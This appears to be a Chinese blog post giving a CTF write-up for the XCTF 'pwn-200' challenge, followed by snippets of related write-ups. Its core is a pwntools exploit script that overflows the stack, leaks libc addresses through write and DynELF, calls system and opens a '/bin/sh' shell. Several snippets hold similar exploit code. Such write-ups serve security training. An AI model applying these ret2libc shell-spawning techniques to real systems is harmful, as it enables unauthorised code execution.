XCTF PWN高手进阶区之pwn-200

最新推荐文章于 2023-03-20 18:30:37 发布
原创 最新推荐文章于 2023-03-20 18:30:37 发布 · 710 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细解析了PWN-200程序的漏洞利用过程,通过调用write和read函数,泄露和控制地址空间,最终实现shell提权。文章展示了如何使用DynELF库定位系统调用地址,构造payload绕过安全机制。

此题,setbuf未发现有什么作用!
exp:

from pwn import *

sub_addr=0x8048484
def leak(addr):
payload=‘a’*112+p32(write_plt)+p32(sub_addr)+p32(1)+p32(addr)+p32(4)
p.sendline(payload)
return p.recv()[:4]

p=process("./pwn-200")
print p.recv()
elf=ELF("./pwn-200")
write_plt=elf.sym[‘write’]
write_got=elf.got[‘write’]
read_plt=elf.sym[‘read’]
pop3_ret=0x0804856c

d=DynELF(leak,elf=elf)
system_addr=d.lookup(‘system’,‘libc’)
bin_sh_addr=0x0804b000-8
payload=‘a’*112+p32(read_plt)+p32(pop3_ret)+p32(0x0)+p32(bin_sh_addr)+p32(0x8)+p32(system_addr)+p32(0x0)+p32(bin_sh_addr)
p.sendline(payload)
p.sendline(’/bin/sh’)
p.interactive()

XCTF-PWN pwn-200(使用DynELF利用write泄露system地址)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-19 460
题目下载地址:点此下载 查保护 只开启了NX 查看是否有后面函数,没有!所以需要利用DynELF泄露system地址获取shell。 这题比较简单,就不写详细解释了,直接上EXP。 EXP: # -*- coding: utf-8 -*- # @Author: 夏了茶糜 # @Date: 2020-03-19 14:01:14 # @email: sxin0807@qq.com # @Las...
[攻防世界 pwn]——pwn-200
Y_peak的博客
02-20 901
[攻防世界 pwn]——pwn-200 题目地址: https://adworld.xctf.org.cn/ 题目: peak小知识 ret2libc的题型, 一般给一个输出和一个输入的函数, 输入一般可以栈溢出。但是没有system和"/bin/sh"。首先, 利用已知的函数leek出来一个地址返回地址是可循环调用的地方,一般是用puts,或者write函数leek地址, 偶尔有时是printf函数, 然后找出libc版本计算偏移, 找到system和’/bin/sh’ 地址。重新构造rop链进而获
攻防世界pwn——pwn-200
qq_62076255的博客
12-23 680
做题记录
pwn-200(xctf)
weixin_43868725的博客
08-08 707
0x0 程序保护和流程 保护: 流程: main() overflow() 明显的栈溢出漏洞。 0x1 利用过程 1.由于题目没有给出libc的版本,所以需要通过pwntools中的DynELF或者Libcsearch得出libc的版本。 2.如果使用DynELF则需要向内存写入**/bin/sh**,而Libcsearch则不用。 3.payload的构造(以DynELF为例): payload=padding+p32(read_plt)+p32(ppp_addr)+p32(0)+p32(bss_
攻防世界 pwn-200
weixin_56777139的博客
03-20 416
32位 ret2libc。
pwn100 [XCTF-PWN][高手进阶]CTF writeup攻防世界题解系列16
重新启程
12-23 1432
题目地址:pwn100 本题已经是高手进阶的第五题了,难度也在不断加大。需要补充的知识点也越来越多了。 废话不说,看看题目 没什么建议和描述,那就先下载附件,看看保护机制 root@mypwn:/ctf/work/python/pwn-100# checksec d0b5f9b486bb480c9035839ec896252e [*] '/ctf/work/python/pwn-10...
攻防世界-PWN进阶-EasyPwn(XCTF 4th-WHCTF-2017)
weixin_44145820的博客
03-04 2229
这题其实不算难,不过漏洞比较隐蔽,需要细心才能发现 题目分析 checksec: RELRO只是部分开启,考虑覆写GOT表 main: echo: 在该函数中存在一个溢出: v2的大小为1000(0x3E8),而我们的输入最大为0x438(输入缓冲大小为0x400),如果我们的输入大于0x3E8,就会覆盖了v3的内容(%s),而%s是snprintf在向v2写入数据时格式化写入的数据的,如...
攻防世界-PWN进阶-Noleak(XCTF 4th-QCTF-2018)
weixin_44145820的博客
03-01 1044
本题主要考察对堆的利用,需要有一定的背景知识,本文也参考了几篇大佬的Writeup,让本文尽可能详细。 题目分析 checksec: 本题的RELRO是完全开启的,意味着我们不能通过修改GOT表来进行攻击 以下是源代码: main函数 delete函数: 这里可以看到free之后没有把指针置空,可能有UAF或者Dubble Free edit函数: 在本函数中,没有检测大小就直接写入,明显...
pwn1 babystack [XCTF-PWN][高手进阶]CTF writeup攻防世界题解系列19
重新启程
12-25 1943
题目地址:pwn1 babystack 已经到了高手进阶的第八题了,已经渐入佳境了。哈哈! 废话不说,看看题目先 厦门邀请赛的题目,还是2星难度,那就开工了。 管理检查一下保护机制: [*] '/ctf/work/python/pwn1/babystack' Arch: amd64-64-little RELRO: Full RELRO Stac...
warmup [XCTF-PWN][高手进阶]CTF writeup攻防世界题解系列14
重新启程
12-23 2021
题目地址:warmup 这是高手进阶的第三题,我们先看下题目内容 这个题目没有附件,那就是要fuzz的题目了,我们先正常走一下程序看看 root@mypwn:/ctf/work/python/warmup# nc 111.198.29.45 32453 -Warm Up- WOW:0x40060d >AAA 这个题目的出发点就是要大家做fuzz,看下提示内容有个地址0x40060...
2017湖湘杯pwn200
12-02
2017湖湘杯pwn200的题目,请大家自行下载。。。。。。
攻防世界 pwn进阶 pwn-200
Kni9hT's Blog
03-04 1846
前言 一到夜晚就不太想睡…想了想还是把昨天(不,前天 )的那题pwn writeup写了吧。虚假の二进制选手终于捡起了他的pwn…话说从web新手转到pwn进阶,wtnl。 学习要点 DynELF的使用 plt地址和got地址的别 如何利用write函数 思考 题目的逻辑不难,开启了NX防护(即不能直接执行栈上的数据,通常使用ROP,本题就是),没有给libc地址,有个明显的栈溢出漏...
攻防世界pwn200
qq_25044201的博客
01-17 341
因为学校放假再加上回家学车,学习进度耽搁一段时间。算了废话少说 来看题 用ida分析 发现与之前做的level3极其相似 但是没有给libc库,所以我们得安装LibcSearcher这个能根据你所给的函数来计算libc的版本,进而得到system和bin_sh的地址 这里是准备工作 这里是获取pwn200文件中的有用地址 这里通过write函数泄露write的真实地址(got表里的地址才是真是地址,通过write函数显示在标准输入上) 获得libc的基地址,然后计算system和bin_sh的
pwn200 [XCTF-PWN][高手进阶]CTF writeup攻防世界题解系列21
重新启程
12-25 1704
题目地址:pwn-200 不知不觉已经到了高级进阶的第十题了,攻防世界设计的学习过程,确实降低了学习曲线的陡峭程度。 废话不说,看看题目先 看一下难度星级陡然提升到5颗星,心里是不是有点懵逼!哈哈 先看看保护机制: [*] '/ctf/work/python/pwn200/9c6084f8a3b2473e8a9e9815099bfec5' Arch: i386-32-...
攻防世界 pwn200 WP
Zarcs_233的博客
01-28 536
32位栈溢出程序 具体思路(ROP): 1.搞到system函数地址,可以通过dynelf 2.写入’/bin/sh’,用做system参数 3.调用system函数 EXP: from pwn import * context.log_level='debug' p=remote("111.198.29.45",30502) start=0x80483D0 #程序起始代码,实现复用 def...
攻防世界-pwn-200-Writeup
SkYe's Blog
05-15 503
pwn-200 [collapse title=“展开查看详情” status=“false”]考点:栈溢出、泄露地址 漏洞函数如下: ssize_t sub_8048484() { char buf; // [esp+1Ch] [ebp-6Ch] setbuf(stdin, &buf); return read(0, &buf, 0x100u);//溢出 } 可操作空间空间很长就不需要什么骚操作了。就是没给 libc 文件,需要去libc database 查一下而已。查到
(攻防世界)(XDCTF-2015)pwn200
PLpa的博客
07-13 2361
这一题和JarvisOJ中的level4简直不要太像了,只是改变了几个地址,改变了溢出点。 既然前面已经讲解了,这里就不再重复讲了,详细解法请看链接:https://blog.youkuaiyun.com/qq_43986365/article/details/95081996 完整exp如下: #! /usr/bin/env python from pwn import * p=remote('111.19...
ADworld pwn wp - pwn-200
fa1c4的blog
06-25 221
明显的栈溢出, 动态链接, 无libc利用, ret2libc, 板子打法, 用pwntools的DynELF模块泄露libc地址, 原理是结合puts或writes函数泄露地址, 所以有两个利用条件: 漏洞可以泄露libc地址 漏洞可以反复利用(ret 回到函数开头继续执行) write函数 头文件:#include <unistd.h> 定义函数:ssize_t write (int fd, const void * buf, size_t count); 函数说明:write(...
pwn基础题目
最新发布
11-20
以下是一些pwn基础题目的相关内容: - **题目一**:该题加载完成后直接f5反编译可得一串代码。做pwn题的目的通常是获取flag,关键在于找到黑掉对方电脑的方法。在ctf pwn中,出题人会设计漏洞,利用这些漏洞可查看服务器文件内容。本题文件本身是一个后门函数,其作用是提升用户权限,执行`system('/bin/sh')`代码能让权限提升,进而查看其他文件获取flag。该题真实考点是nc,在终端输入`nc node4.buuoj.cn 29499`可连接服务器,之后`cat flag`就能获得flag [^1]。 - **题目二**:攻防世界XCTF - Pwn入门11题中的签到题,啥也不用干,直接可以获得shell然后拿到flag。解题代码如下: ```python from pwn import * r = remote("111.198.29.45", 59457) r.interactive() r.close() ``` [^2] - **题目三**:编写攻击程序的题目,代码如下: ```python from pwn import * p = remote("node5.buuoj.cn", 28053) payload = b'a'*(0xf + 8) + p64(0x401186) p.send(payload) p.interactive() ``` [^3] - **题目四**:已知buf真实大小为16个字节,溢出到返回地址需要20个字节垃圾数据,构造payload解题。代码如下: ```python from pwn import * p = process('./pwn_01') # p = remote('pwn.node.game.sycsec.com', 30345) # gdb.attach(p) elf = ELF('./pwn_01') context(os="linux", arch="amd64", log_level='debug') backdoor = 0x80484b6 payload = b'a'*20 + p32(backdoor) p.recv() p.sendline(payload) p.interactive() ``` [^4] - **题目五**:夏令营第二周pwn的level0题,解题代码如下: ```python s_addr = 0x0000000000400596 p = remote("pwn2.jarvisoj.com", 9881) p.recvline() p.sendline("A"*0x80 + 'A'*8 + p64(s_addr)) p.interactive() ``` [^5]
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值